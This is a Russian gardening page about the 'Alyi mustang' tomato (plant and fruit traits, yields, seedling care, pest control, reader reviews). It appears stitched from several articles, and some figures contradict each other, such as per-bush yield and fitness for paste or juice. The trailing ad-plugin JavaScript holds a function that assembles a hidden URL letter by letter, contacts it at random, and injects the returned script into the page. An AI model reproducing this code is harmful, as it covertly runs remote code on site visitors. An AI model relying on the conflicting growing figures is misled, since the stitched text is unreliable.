2 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Описание томата алый мустанг

Сорт томата Алый мустанг

Томат Алый мустанг порадует необычной формой плодов и отличной урожайностью. Данный сорт приобретает все большую популярность среди огородников, хотя отзывы о нем не всегда однозначны. Для успешного выращивания полезно ознакомиться с особенностями, правилами агротехники и опытом овощеводов.

Сорт томата Алый мустанг

Краткая информация о сорте

  • Плоды: темно-красного цвета, перцевидной формы, массой от 80 до 300 г.
  • Куст: индетерминантный, высотой 100-200 см.
  • Урожайность: 3-5 кг с одного растения.
  • Устойчивость: высокий иммунитет к заболеваниям.
  • Распространение: рекомендован для тепличного выращивания в средней полосе, на юге – в открытых грядках.
  • Применение: салаты, горячие блюда, засолка, консервирование, переработка на кетчупы и пасты.
  • Посадка: посев – во второй половине марта, пересадка – в конце мая; схема высадки – 50Х60 см.
  • Почва: легкая, рыхлая.
  • Уход: полив – еженедельно, подкормки – два раза в месяц, формирование – в 2 стебля, подвязывание – обязательно.
  • Период созревания: среднеспелый – плоды созревают через 110-115 дней после всходов.

Общая характеристика

Томаты Мустанг индетерминантного типа, куст может быть среднерослым или высокорослым (высота – 100-200 см). Растение – средне-ветвистое и малооблиственное. Срок созревания – среднеспелый.

Урожай собирают через 110-115 дней после прорастания семян. Плоды завязываются в кистях по 5-8 штук.

Плоды

Помидоры отличаются интересной перцевидной формой, достигают в длину от 10 до 20 см. Масса их колеблется от 80 до 300 г. Цвет чаще всего – темно-красный. Мякоть – плотная и мясистая. Вкус – сладковатый, с кислинкой.

Плоды хороши в салатах, нарезках, горячих блюдах. Они идеально подходят для консервирования и эффектно смотрятся в банках. Их можно перерабатывать на кетчупы и пасты, но не на сок (в помидорчиках слишком мало жидкости).

Урожайность

Обычно с одного куста собирают от 3 до 5 кг плодов. По описанию некоторых огородников, урожайность может достигать 6-7 кг.

Для получения хороших урожаев рекомендуется не загущать посадки и формировать томаты в 2-3 стебля.

Устойчивость к болезням и вредителям

Помидоры Алый мустанг обладают хорошей устойчивостью к заболеваниям, но все равно нуждаются в профилактике.

По описаниям огородников, томат может болеть фитофторой и реже – бурой пятнистостью листьев. Из насекомых-вредителей угрозу представляет тля, проволочник, белокрылка, паутинный клещ.

Распространение

Данный сорт можно выращивать во всех регионах страны.

В Краснодарском крае и теплых южных областях он отлично себя чувствует в открытом грунте.

В средней полосе (Центральный, Черноземный, Северо-Западный районы) его культивируют в теплицах или под временным укрытием.

На Урале и в Сибири его лучше высаживать в обогреваемые теплицы.

Достоинства и недостатки

Плоды хороши в консервированном виде

К преимуществам Алого мустанга относят:

  • интересную форму и привлекательный вид плодов;
  • сорт идеально подходит для консервирования;
  • наблюдается устойчивость к заболеваниям, холодам и переменам погоды;
  • отличные характеристики лежкости;
  • томаты не трескаются при созревании и не повреждаются при транспортировке.
  • не всем нравится вкус плодов (некоторые огородники считают его кисловатым);
  • судя по противоречивым отзывам, при покупке семян велик риск приобрести пересортицу.

Особенности выращивания

Чтобы высадить растения в открытый грунт в конце мая, посев делают во второй половине марта. Семена обрабатывают марганцевым раствором, а почвосмесь из садовой земли и торфа прокаливают в духовке.

Глубина посева семян – 0,5-1 см. Лоток накрывают полиэтиленом и ставят в теплое место.

Оптимальная температура для появления всходов 24-25°С, а для последующего укоренения 15°С (в течение 5-6 дней).

Пикировку делают на стадии 2-х настоящих листьев. За 10-14 суток до пересадки томаты закаливают, ежедневно вынося горшки на улицу. Почву в теплице или на грядке удобряют компостом, перекапывают и рыхлят. Устанавливают опоры для подвязывания или шпалеру.

Растения высаживают в лунки по схеме 50 на 60 см (при этом вносят золу, яичную скорлупу и суперфосфат), обильно поливают теплой водой, окучивают.

Кусты рекомендуют формировать в 2 стебля, подвязывать к опорам или шпалере. Поливают раз в 7-10 дней, после этого рыхлят грядку или мульчируя.

В качестве мульчи можно использовать торф, сухую траву, нетканые черные материалы. Также к мерам ухода относят прополку и внесение удобрений.

Подкормки делают дважды в месяц – органикой (куриный помет, коровяк, растительные настои) и фосфорно-калийным минеральным комплексом.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Первую подкормку проводят спустя 7-10 дней после высадки на постоянное место. Для первой подкормки использую минеральные азотные удобрения (аммиачная селитра, карбамид) или быстродействующие органические — настой коровяка или птичьего помета.

Борьба с болезнями и вредителями

Во избежание фитофтороза помидоры нужно обработать бордоской жидкостью сразу после пересадки (и продолжать обработку в дальнейшем согласно инструкции).

Почву на грядках можно припудривать древесной золой. При первых признаках заболевания кусты опрыскивают медьсодержащими препаратами. Если на листьях появляются бурые пятна (листовая плесень), необходимо полить растения марганцем, опрыскать хлорокисью меди или оксихомом.

Томатам часто досаждают тля и белокрылка – их нужно смывать раствором хозяйственного мыла. Заметив паутинного клеща, надо протереть листочки медицинским спиртом.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Для борьбы с клещом используют препараты — акарициды: Фитоверм, Акарин, Антиклещ.

Обитающий в земле проволочник не любит горчицу – ее можно высаживать рядом с грядкой или растворять в воде и поливать почву. Если подручные средства в борьбе с насекомыми не помогают – необходимо использовать инсектициды и акарициды.

Распространенные ошибки

К типичным ошибкам при культивировании относят:

  • очень плотное размещение кустов на грядке (томат отличается разветвленной корневой системой, которой требуется простор);
  • затененное место для участка под помидоры – без достаточного освещения вкус плодов ухудшается;
  • слишком частый полив, что провоцирует фитофтору, особенно – при выращивании в теплицах.

Описание томата Алый Мустанг

Каждый год огородники стают перед вопросом, какой сорт выбрать на этот год для посадки, ведь он должен быть и с хорошими показателями урожайности, и плоды большие, а главное – сочные. Томат Алый Мустанг – тот вид томатов, который подходит по всем характеристикам.

Описание томата Алый Мустанг

Характеристика сорта

Размножение происходит методом посева семян или саженцев. Более того, многие опытные садоводы рекомендуют такой сорт размножать только с помощью саженцев, таким образом, есть больше шансов получить максимальный урожай.

Сложно сказать, что у томата Алый Мустанг большой процент урожайности. Если правильно ухаживать за кустами и сохранять оптимальную температуру, то можно получить большой процент урожайности, но бывают периоды, что даже при отличном уходе, кусты ничего не дают, 1-2 плода. Сорт был выведен в Российской Федерации, в Сибири, в 2014 году попал в официальный реестр для посадки в открытом грунте и в теплицах.

Описание растения

Описание куста заслуживает внимания. Такой тип кустов мощный и вырастет на 1, 9 м. Листьев на кусте не много, томат Алый Мустанг иногда может выглядеть намного реже, чем остальные представители помидоров.

Описание гласит, что кисти у сорта не сильно развиты, в среднем, на них 5-8 плодов. Соцветие не сложное, начинается после 6-9 листка, а затем встречается после 2. Листья темного зеленного оттенка с немного выраженной опушкой. Сильное корневище с центральным развитием по горизонтали.

Куст необходимо подвязывать, так как на одной ветке может быть более 10 штук. Ветка этого не выдерживает, поэтому ее необходимо постоянно подпирать.

Описание плода

Томат Алый Мустанг популярен среди огородников, у него интересная форма и отменный вкус, который смог удивить и покорить многих специалистов. Плоды имеют яркий насыщенный красный цвет. По структуре плотные и крупные, один плод весит от 150 до 250 г. Внутри сочный помидор с нежной мякотью. Такой вид подходит как для свежего использования, так и для консервации. Специалисты утверждают, что мякоть не подходит для сока.

Все плоды продолговатые и длинные, формой сильно напоминают сосиску с небольшой ребристостью. Плоды могут достигать 23 см, кожица гладкая, ни в каких случаях не трескается.

Плоды трех-камерные, большой процент сухих веществ, специалисты утверждают. Плоды могут долго храниться и при длительной транспортировке не теряют товарный вид.

Преимущества

Плоды данного сорта хорошо транспортируются и долго хранятся

Выделяют следующие положительные характеристики помидора Алый Мустанг:

  • долго лежит;
  • легко переносит транспортировку;
  • быстро созревает;
  • вкусные и ароматные;
  • уникальная форма.

К недостаткам можно отнести то, что сорт выдает максимальный урожай, только при теплых условиях прибивания. Для открытой почвы практически не подходит и, если лето было холодным, то 65% того, что урожайность Мустанга будет маленькой, а многие плоды просто не созреют до конца и завянут.

Правила выращивания

Томат Алый Мустанг можно высаживать для рассады в начале марта и в начале апреля. Также необходимо подготовить к высадке семена. Необходимо вымачивать в особом растворе примерно минут 30, а потом пересадить в любую влажную материю, чтобы пустить корни.

Посадка происходит в одну большую миску или емкость не глубже, чем на 1 см, а между растениями придерживайтесь 1-2 см. Емкость с землей и семенами необходимо накрыть пленкой, чтобы появились первые ростки. Не забывайте, что обязательно нужно пленкой укрывать тару, чтобы внутри было постоянно влажно. Как только появятся первые два листочка, пленку необходимо сразу убрать. За одну неделю до непосредственно высадки нужно приготовить к этому растение.

На момент посадки все саженцы должны быть больше 20-30 см. На открытом грунте высаживайте растение на расстоянии 55 см. Постоянно поливайте и удобряйте каждую неделю.

Заключение

У растения иммунная система, может противостоять всем болезням, но все же необходимо проводить профилактику перед посадкой. Используйте любой удобный для вас препарат и опустите на 20 минут. Только после этого производите пересадку.

Долгохранящийся сорт томата — Алый мустанг: характеристика и описание

Алый мустанг — детище сибирских селекционеров. Сорт был внесен в реестр несколько лет назад, в 2014 году. За время своего существования эти томаты завоевали любовь большей части огородников и заслужили немало лестных отзывов.

Высота Место посадки Сроки созревания Цвет плодов Размер плодов Происхождение Форма плода
Высокорослый Теплица, Открытый грунт Среднеспелые Красные Средний Сорт Перцевидные

Описание и характеристика сорта

Томаты этого сорта рекомендованы для выращивания в открытом грунте, пленочных укрытиях, теплицах. Алый мустанг
относится к индетерминантным видам, вырастает до 1,8м, но рост не прекращается. Нештамбовый – отпускает пасынки, есть возможность формирования двух стеблей. Листьев немного, они крупные, темно-зеленого цвета. Корневище мощное, разрастается по горизонтали.

  • Томат со средним сроком созревания, от посевов до готового продукта около 120 суток.
  • Первое соцветие появляется после 7 листа, следующие — через каждые 2.
  • Соцветия – кисти содержат 5-7 вытянутых, похожих на небольшие перчики, плодов.
  • Спелые трехкамерные плоды вырастают в длину до 18-25 сантиметров.
  • Шкурка у томатов плотная, сочная мякоть имеет характерный томатный аромат и приятный вкус.
  • Цвет насыщенный красно-малиновый.
  • Наилучший результат достигается при формировании куста в две ветви.
  • Для получения большего урожая томат стоит выращивать в теплицах, под укрытиями.

Преимущества и недостатки

  • урожайный;
  • устойчивый к болезням;
  • вредителям;
  • транспортабельный и легкий томат с хорошими вкусовыми свойствами;
  • мощные корни обеспечивают надлежащее питание растений;
  • малое количество листвы облегчает уход и не забирает питание у завязей.

Минусы:

  • угнетение развития при понижении температуры. Алый мустанг любит солнце. В холодное и мокрое лето томаты, высаженные в открытом грунте, дают плохой урожай.
  • плохая устойчивость к фитофторе.

Урожайность

Алый мустанг — очень плодовитый томат. Растение буквально усыпано красивыми гроздьями вытянутых гладких помидоров.

  • Томаты созревают кистями, средний вес одной помидорки 150 -250 грамм, первые на кисти иногда вырастают до 400 грамм.
  • Сорт высокоурожайный, от 3,5 до 5 кг с растения.
  • С 1 м 2 при благоприятных условиях собирают до 25 кг помидоров.
  • Урожай можно есть в свежем виде, хранить, закатывать в соления и маринады.

Особенности выращивания и хранения

Для сорта характерно образование большой корневой системы, поэтому рассаду желательно пересаживать в горшочки объемом около двух литров. Чтобы стволики не истончались, надо установить специальную лампу для досвечивания рассады.

Томат замечательно сохраняет вкусовые качества в течение долгого времени. Хранение спелых плодов производится в темных прохладных помещениях с хорошей вентиляцией.

Посадка и уход

Перед посевом семена обеззараживают раствором марганцовки и обрабатывают для быстрого прорастания стимуляторами роста. Затем укладывают их на ткань, оставляют в теплом месте.

Пока семена прорастают, надо заняться грунтом. Его можно сделать из смеси песка, перегноя, дерновой земли или купить готовый. Как только семена на ткани проклюнутся, их переносят во влажный грунт. После этого землю в таре накрывают стеклом для поддержания оптимального микроклимата.

Первую подкормку рассады делают спустя две недели после пикировки. Пересадка в грунт происходит через 55 -60 дней после всходов. В заранее подготовленную лунку вбивают колышек для подвязки и вносят немного комплексного удобрения.

Основа регулярного ухода за томатом — подкормки, полив, рыхление земли. Подкормку производят 3-4 раза за сезон. Также нужно вовремя удалять пасынки, следить за нарастанием зеленой массы.

Томат Алый мустанг: отзывы, фото

Современный рынок насыщен самыми разнообразным семенами сельскохозяйственных культур. Названия некоторых из них звучат иногда очень интригующе и привлекают внимание огородников. Ведь заядлые дачники стараются выращивать на своем участке не только опробованные, но и новые сорта и гибриды овощных растений. Томат Алый мустанг сразу привлекает к себе любителей сельскохозяйственных работ и столь странным названием, и необычным видом плодов на пакетике с семенами. Конечно же многие покупатели специализированных магазинов приобретают посадочный материал, услышав удачную рекламу. Огородники после получения урожая томатов Алый мустанг остаются довольны, что посадили у себя растения данного сорта. Все положительные характеристики, указанные на упаковке с семенами, подтверждаются при выращивании пасленовой культуры.

Описание томата Алый мустанг

Сорт Алый мустанг был получен в результате длительной работы русскими селекционерами. Сорт достаточно молодой, его возраст не превышает десятилетие. Но томаты Алый мустанг были подвергнуты тестированию учеными-биологами и разнообразным испытаниям, которые провели опытные огородники. После получения положительных результатов сорт прошел официальную процедуру регистрации в Госреестре РФ.

По описанию селекционеров томаты сорта Алый мустанг представляют собой мощный куст с такими частями:

  1. Разветвленной корневой системой, способной добывать влагу с большой глубины. Поэтому томаты без проблем переносят кратковременную засуху. Это также обуславливает условия пересадки. При пикировке каждый росток высаживается в емкость объемом 1 л. Это нужно для того, чтобы корни беспрепятственно развивались.
  2. Высоким толстым стеблем, высота которого может достигнуть 1,6 м.
  3. Крепкими ветками, покрытыми немногочисленными листовыми пластинками. Благодаря малому количеству листвы вызревающие плоды получают нужное количество солнечного тепла и света и при минимальной освещенности.
  4. Крупными желтыми цветками, собранными в кисти. Самое первое соцветие образуется вверху 7–8 листа.
  5. В цветочной кисти может завязаться и вызреть 5–7 помидоров.

Сорт является индетерминантным, рост кустов нужно периодически ограничивать. Алый мустанг относится к группе томатов со среднеранними сроками созревания.

Описание плодов

Не зря томат получил имя Алый мустанг. Его плоды крепкие и плотные, почти как тело мускулистой дикой лошади. А еще помидоры напоминают вытянутый сладкий перец.

Описание плодов томата Алый мустанг:

  • длина от 20 до 24 см;
  • форма овальная с вытянутым конусообразным кончиком;
  • поверхность гладкая и не ребристая;
  • кожица тонкая и плотная;
  • масса 200–300 г;

Цвет помидоров в молочной спелости – светло-зеленый, а у вызревших – насыщенно-красный или красно-малиновый. Вкусовые качества плодов неплохие. Но некоторым огородникам не очень нравится, что помидоры несочные.

Характеристика томата

Сорт считается промышленным. Алые томаты могут выращиваться на больших площадях. Фермеры считают использование пасленовой культуры рентабельным. Но и на приусадебных участках Алый мустанг порадует огородника стабильным и хорошим плодоношением.

Урожайность и плодоношение

Как видно по фото, томат Алый мустанг хорошо плодоносит.

  1. Если посадить кусты в теплице, то они будут плодоносить больше, чем высаженные в открытом грунте помидоры.
  2. Урожайность куста редко превышает 3–4 кг в северных регионах и 5–6 кг в южных.
  3. Товарность собранных плодов – до 96%.
  4. При недостатке тепла и солнечных лучей урожайность в разы снизится.
  5. Первый сбор томатов проводят уже через 90–120 дней.

Область применения плодов

По отзывам, томат Алый мустанг можно употреблять в сыром виде. Он используется при приготовлении салатов, супов и других блюд домашней кухни, плоды придадут блюду тонкий аромат и яркий вкус помидора. Также он годится для приготовления икры, солений и маринада. Однако из-за вкуса сорт не стоит брать для приготовления варения или других блюд, для которых подходят более сладкие разновидности. Мустанг не подойдет для создания томатной пасты, соуса или заправки для рагу, так как плоды вырастают крепкими и плотными.

Устойчивость к заболеваниям и вредителям

Как и многие современные сорта, Алый мустанг устойчив к заболеваниям, характерным для пасленовых культур. Насекомые-вредители также редко поражают томаты.

Достоинства и недостатки сорта

Сорт томатов Алый мустанг обладает следующими характеристиками:

  1. При регулярных обработках, уходе и дождевании куст будет хорошо плодоносить. В среднем, с растения собирают 8 кг помидоров за сезон.
  2. Благодаря твердости и упругости, томаты Мустанг легко перевозить. Транспортировка не испортит качества урожая, независимо от количества помидоров и длины пути.
  3. Вкусовые характеристики позволяют использовать томаты в качестве ингредиента в различных блюдах домашней кухни.
  4. В кулинарии используются как созревшие, так и зеленые томаты Мустанг.

Среди недостатков этого сорта можно отметить такие:

  1. Вкус томатов будет напрямую зависеть от погодных условий. Дождливые дни станут причиной пресности плодов, а солнце сделает их вкус более насыщенным.
  2. Растение неустойчиво к холоду. При понижении температуры воздуха до 6 °С выше нуля прекращается рост и нормальное развитие плодов.

Правила выращивания

Несмотря на то что томаты этого сорта не обладают особыми качествами, они нуждаются в постоянном уходе. Только с таким условием они будут плодоносить и приносить хороший урожай.

Посадка на рассаду

Первым шагом к выращиванию алых томатов сорта Мустанг будет посадка рассады:

  1. Необходимо взять грунт, насыщенный минеральными соединениями. Его смешивают с землей с грядки, на которую впоследствии будут высажены помидоры.
  2. Семена закладывают на глубину 2 см, обильно смачивают почву. Расстояние между посажеными растениями — не меньше 8 см.
  3. Когда ростки вытянутся до 5 см в длину и окрепнут, их можно закаливать. А затем – высаживать в открытый грунт или теплицу.

Пересадка томата

Оптимальным временем высадки будет время, когда на улице установилась постоянная температура выше +18 °С. В обычные теплицы ростки пересаживают в конце мая — июне, в отапливаемые комплексы — уже в апреле. При размещении в 1 ряд помещают 1 куст на 50 кв. см, 2 ряда — 1 растение на 60 кв. см, в 3 ряда — 1 куст на 80 кв. см.

Последующий уход за томатами

При уходе за томатами этого сорта необходимо соблюдать следующие правила:

  1. Проводить дождевание каждые 3 дня. При жаре — не реже раза в 2 дня.
  2. Подкормку повторяют каждые 3 недели. Для этого используют органические удобрения и добавки, в состав которых входят полезные для бактерий-симбионтов вещества.
  3. Когда кусты дорастут до 70 см в длину, необходимо подвязать растения. Для этого используют синтетические веревки и палки для опоры.
  4. Во время пасынкования оставляют только 2 основных стебля. Удаляются все боковые и слабые отростки. Процедуру прекращают после появления плодов.
  5. По отзывам опытных огородников, при уходе за сортом томата Алый мустанг не стоит мульчировать почву.

Борьба с вредителями и заболеваниями

Хоть сорт Алый мустанг и устойчив к напастям в виде заболеваний и насекомых, опытные дачники советуют осуществлять профилактические мероприятия. Особенно если томаты растут в условиях теплиц. Повышенная влажность т высокие температуры увеличивают вероятность поражения пасленовой культуры. Обычно применяют обработке бордосской жидкостью или медным купоросом.

А от вредителей помогают инсектициды, имеющие биологическую основу. Даже большое количество насекомых можно уничтожить за 2 часа, если провести обработку средством. А еще, инсектицид термостабилен, то есть не теряет своих свойств при температуре выше 30 °С.

Заключение

Томат Алый мустанг, по мнению многих садоводов, является хорошим растением для разведения. Однако для получения богатого и вкусного урожая необходимо усердие и терпение, иначе куст не будет обильно плодоносить.

Характеристика и описание сорта томата Алый мустанг

Новый сорт помидор с названием Алый мустанг имеет положительные отзывы среди огородников. Его под силу вырастить даже неопытным людям. Он неприхотлив в уходе, имеет иммунитет ко многим болезням, и к тому же невероятно вкусный. Он признан уникальным сортом за его необычную форму в виде удлиненных перцев.

Этот сорт не боится холодов северных районов, прекрасно приспосабливается к засухе, дождливой погоде, колебаниям температур. Урожайность томатов Алый мустанг зависит от качества ухода. Сорт вошел в 2014 году в Государственный реестр Российской Федерации. Его можно выращивать даже в открытом грунте под пленкой. Характеристика и описание сорта указаны или на пакетах с семенами.

Подробности о сорте

Томаты созревают обычно через три месяца после всходов семян. Этот сорт не является ранним. Куст состоит из толстого стебля, на котором висят грозди с томатами. Листьев мало, в основном они наверху. Они темно-зеленые с пушком. Куст высокий, длина его составляет около полутора метров.

Урожайность средняя, с куста можно собрать примерно 11 штук. Сорт годится для выращивания в парниках или открытом грунте. Может долго храниться в свежем виде. Срывать лучше спелые томаты с куста.

Из него получаются прекрасные салаты и нарезки. Их любят есть в свежем виде взрослые и дети. Можно их консервировать в банках, готовить соусы, аджики, пасты, соки.

Томаты внешне похожи на перцы, особенно, когда висят на кустах. Они удлиненные, длина их примерно 12-16 сантиметров. Вес не более 200 граммов. Название произошло именно из-за причудливой формы. В банках смотрятся очень интересно. Вкус кисло-сладкий. Цвет темно-красный. Кожица у плодов плотная, не трескается. При правильном выращивании они хрустящие, крепкие, мясистые. Плодоносят с конца июля по сентябрь, плоды созревают на кистях постепенно.

Томаты годятся для продажи, отлично переносят перевозки. Нужно узнать, как правильно выращивать, чтобы их было достаточное количество, и плоды были нужного вкуса и формы.

Как правильно выращивать Алый мустанг

Выращивание Алого мустанга в условиях умеренного климата явление довольно простое. В парник или открытый грунт сорт высаживается рассадой, которую проращивают дома из семян. Семена покупают в магазинах для сада и огорода.

Семена сажают в специальные емкости, предварительно замочив в марганце. Проращивают под пленкой, пока не проклюнутся ростки. Когда на них появится несколько листиков, их можно рассадить, чтобы им было больше света и простора. Так они лучше будут питаться.

Высаживают в огород только крепкую рассаду длиной около 30 сантиметров. Она должна быть закалена в условиях балкона, стебель должен быть крепкий, толстый.

Посадки стоит делать соблюдая дистанцию между кустами, чтобы к ним удобнее было подходить. Сразу подвязать и формировать в один-два стебля. Рекомендовано обрабатывать томаты стимуляторами роста во время цветения, а также удалять лишние отростки. Пасынкование проводить нужно два раза в месяц.

Урожай будет достаточным, плоды будут очень вкусными, если обеспечить нужный уход этим культурам.

Уход и забота

Уход за помидорами Алый мустанг мало отличается от ухода за другими сортами. К тому же он не очень капризный, но любит расти на хорошей плодородной земле. Поэтому важно своевременно подкармливать кусты несколько раз за их рост органическими или минеральными удобрениями. В землю стоит положить навоз и песок.

Второе условие – это хороший полив теплой отстоянной водой. Поливать под корень чистой дождевой водой. Очень важно постоянно рыхлить землю, мульчировать, удалять сорную траву.

Для борьбы с насекомыми можно опрыскивать кусты специальными растворами, чтобы создать пагубную для них среду. Помидоры почти не болеют, но для профилактики их обрабатывать стоит.

Чтобы регулировать влажность в парнике, надо открывать иногда окна и двери. Не нужно сажать рядом с кустами что-то высокое, чтобы не загораживать свет.

Так как кусты длинные, после высаживания в землю, надо их подвязать веревкой. Пасынкование также необходимо.

Если обеспечить нужную заботу, то томаты будут радовать сочными, сладкими плодами в конце лета.

Мнения огородников

О данном сорте отзываются всегда лестно те, кто сажал его когда-либо. Ему дают положительные оценки опытные и начинающие огородники.

Марьяна, 43 года: Выращиваю томат без парника уже два года. Плоды очень вкусные, нравятся всей семье. Ни разу не болели. Поливали обильно один раз в неделю. Уход простейший. Растили для еды в свежем виде и аджики, но можно их и мариновать.

Описание томата Алый мустанг сможет помочь в определении требований к уходу, дачники узнают, как правильно его выращивать. Данный сорт понравится тем, кто мало бывает на огороде, а также тем, кто любит оригинальные сорта томатов. Хорошего урожая!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};